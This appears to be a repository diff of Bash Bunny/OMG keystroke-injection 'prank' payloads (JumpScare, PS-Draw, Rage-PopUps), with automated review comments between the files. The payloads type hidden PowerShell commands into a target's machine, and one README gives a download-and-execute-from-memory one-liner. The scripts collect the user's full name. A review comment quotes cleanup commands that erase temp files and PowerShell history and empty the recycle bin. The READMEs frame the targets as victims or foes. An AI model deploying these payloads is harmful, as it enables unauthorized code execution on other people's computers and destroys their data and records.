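Review bot: The cleanup block at the end of the script removes far more than the two files the script created: `rm $env:TEMP\* -r -Force` deletes everything in the user's temp directory, `Remove-Item (Get-PSreadlineOption).HistorySavePath` deletes the user's whole PowerShell history, and `Clear-RecycleBin -Force` permanently empties the recycle bin. The `.DESCRIPTION` block at the top mentions only the wallpaper and the sound, so this data loss is undocumented. I would restrict the removal to the script's own downloads, `Remove-Item "$env:TMP\i.png","$env:TMP\s.wav" -ErrorAction SilentlyContinue`, and list in the description anything else that is changed on the machine. Separately, near the top the image is fetched twice: the hard-coded `iwr ...jumpscare.png?dl=1 -O $env:TMP\i.png` line overwrites the result of `iwr $i`, so editing `$image` has no effect.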


@ -0,0 +1,100 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This script starts off using Invoke-WebRequests to download both and Image and Sound file
Their system volume is then turned up to the max level
The script will be paused until a mouse movement is detected
At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-JumpScare)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

Binary file not shown.

Binary file not shown.


@ -0,0 +1,26 @@
# Title: JumpScare
# Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\JumpScare.ps1')"
QUACK ENTER

Binary file not shown.


@ -0,0 +1 @@
images will be stored here

Binary file not shown.


Binary file not shown.


Binary file not shown.


Binary file not shown.


@ -0,0 +1,232 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
.DESCRIPTION
This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
.SYNTAX
$col | PS-Draw
$hak5 | PS-Draw
$omg | PS-Draw
PS-Draw -Image $col
PS-Draw -Image $hak5
PS-Draw -Image $omg
#>
############################################################################################################################################################
$Colors = @{
1 = 'White'
2 = 'Black'
3 = 'DarkBlue'
4 = 'DarkGreen'
5 = 'DarkCyan'
6 = 'DarkRed'
7 = 'DarkMagenta'
8 = 'DarkYellow'
9 = 'Gray'
10 = 'DarkGray'
11 = 'Blue'
12 = 'Green'
13 = 'Cyan'
14 = 'Red'
15 = 'Magenta'
16 = 'Yellow'
}
#Show available colors
$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
@(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
@(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
@(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
@(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
@(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
@(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
@(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
@(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
@(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
@(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
@(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
@(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
@(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
@(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
@(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
@(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
@(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
# -------------------------------------------------------------------------------------------
function PS-Draw {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("I")]
[object[]]$Image
)
# if the data is sent through the pipeline, use $input to collect is as array
if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
#$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
cls
foreach ($row in $Image) {
foreach ($position in $row) {
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
Start-Sleep -m 10
}
Write-Host ""
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Get name to be used in greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out one of the images above
$col - to see the available colors you can use for a custom image
$hak5 - this will draw out the hak5 five logo
$omg - this will draw out the omg logo
#>
# -------------------------------------------------------------------------------------------
# Call function with one of the arrays listed above to generate an image
$hak5 | PS-Draw
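Review bot: `Get-fullName` mangles names, because `TrimStart("Full Name")` strips any leading run of the characters F, u, l, N, a, m, e and space rather than the literal prefix, so "Nancy" comes back as "ncy" and "Neal" comes back empty. The `catch` is also unlikely ever to run, since `net user` is a native command that reports failure through its exit code, and the `-ErrorAction SilentlyContinue` line after `return` is unreachable. Replace the trim with `$fullName = ("$fullName" -replace '^\s*Full Name\s*', '').Trim()` and make the fallback explicit with `if (-not $fullName) { return $env:UserName }`. The same function is repeated in the PS-Draw script below and as `Get-Name` in the Wallpaper-Troll script.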


@ -0,0 +1,201 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $BackGround
.DESCRIPTION
This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
that can be used in powershell. Finally that image will be drawn in a powershell window.
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
############################################################################################################################################################
Function PS-Draw
{
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
[Switch] $ToASCII
)
Begin
{
[void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
# Console Colors and their Hexadecimal values
$Colors = @{
'FFFFFFFF' = 'White'
'FF000000' = 'Black'
'FF000080' = 'DarkBlue'
'FF008000' = 'DarkGreen'
'FF008080' = 'DarkCyan'
'FF800000' = 'DarkRed'
'FF800080' = 'DarkMagenta'
'FF808000' = 'DarkYellow'
'FFC0C0C0' = 'Gray'
'FF808080' = 'DarkGray'
'FF0000FF' = 'Blue'
'FF00FF00' = 'Green'
'FF00FFFF' = 'Cyan'
'FFFF0000' = 'Red'
'FFFF00FF' = 'Magenta'
'FFFFFF00' = 'Yellow'
}
# Algorithm to calculate closest Console color (Only 16) to a color of Pixel
Function Get-ClosestConsoleColor($PixelColor)
{
($(foreach ($item in $Colors.Keys) {
[pscustomobject]@{
'Color' = $Item
'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
}
}) | Sort-Object Diff)[0].color
}
}
Process
{
Foreach($item in $Path)
{
#Convert Image to BitMap
$BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
Foreach($y in (1..($BitMap.Height-1)))
{
Foreach($x in (1..($BitMap.Width-1)))
{
$Pixel = $BitMap.GetPixel($X,$Y)
$BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
If($ToASCII) # Condition to check ToASCII switch
{
Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
}
else
{
Write-Host " " -NoNewline -BackgroundColor $BackGround
}
}
Write-Host '' # Blank write-host to Start the next row
}
}
}
end
{
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Download the image from wherever you are hosting it
iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
# -------------------------------------------------------------------------------------------
# Get name to use in the greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out your image
Replace the path below with the path of your image
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
# -------------------------------------------------------------------------------------------
# Call the function with the image you'd like to have drawn here
"$env:TMP\omg-ico.png" | PS-Draw
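Review bot: Both pixel loops in `PS-Draw` start at 1, so row 0 and column 0 of every image are never drawn, and for an image one pixel high or wide `1..0` counts down and `GetPixel` is called with an out-of-range coordinate. Use `Foreach($y in 0..($BitMap.Height-1))` and `Foreach($x in 0..($BitMap.Width-1))`. The bitmap is also never released, which can keep the file opened by `FromFile` locked for the life of the process; call `$BitMap.Dispose()` after the row loop.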


@ -0,0 +1,127 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
## Description
These two programs use two different method to draw out images in the Powershell Window.
PS-Draw will convert an image you download into a BMP file estiamte the used colors based off the 16 available powershell colors
then draw your image out in the powershell window. This process is not exact and needed testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered microsoft account or the
UserName environment variable.
The script will then be paused until a mouse movement is detected at which time the pre selected image will be drawn out in the powershell window.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your Device
* A one liner command in the run box will execute the script on the bash bunny
* The image will be converted into a BMP file
* An algorithm will be used to find the closest matching colors available in the powershell window
* The image will be generated in the powershell window
This is an example of an image I used with the PS-Draw command
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/omg-ico.png?raw=true)
This is how the iamge is interpreted and drawn out
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/PS-Draw.jpg?raw=true)
* The PS-Custom-Draw operates a little differently
* One of the preconfigured arrays is piped into the command to generate an image
* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-colors.jpg?raw=true)
* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-omg.jpg?raw=true)
* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-hak5.jpg?raw=true)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-PS-Draw)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,32 @@
# Title: PS-Draw
# Description: This payload is meant to draw images in your targets powershell console. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, STORAGE
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
# There are 2 different versions of this script, un-comment out the one you want to run
# This one will draw one of the custom images defined in the .ps1 file
QUACK STRING powershell -NoP -NonI ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\PS-Custom-Draw.ps1')"
# This one will draw an interpretation of an image you provide
#QUACK STRING powershell -NoP -NonI ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\PS-Draw.ps1')"
QUACK ENTER


@ -0,0 +1,94 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Rage-PopUps
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Rage-PopUps)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,75 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
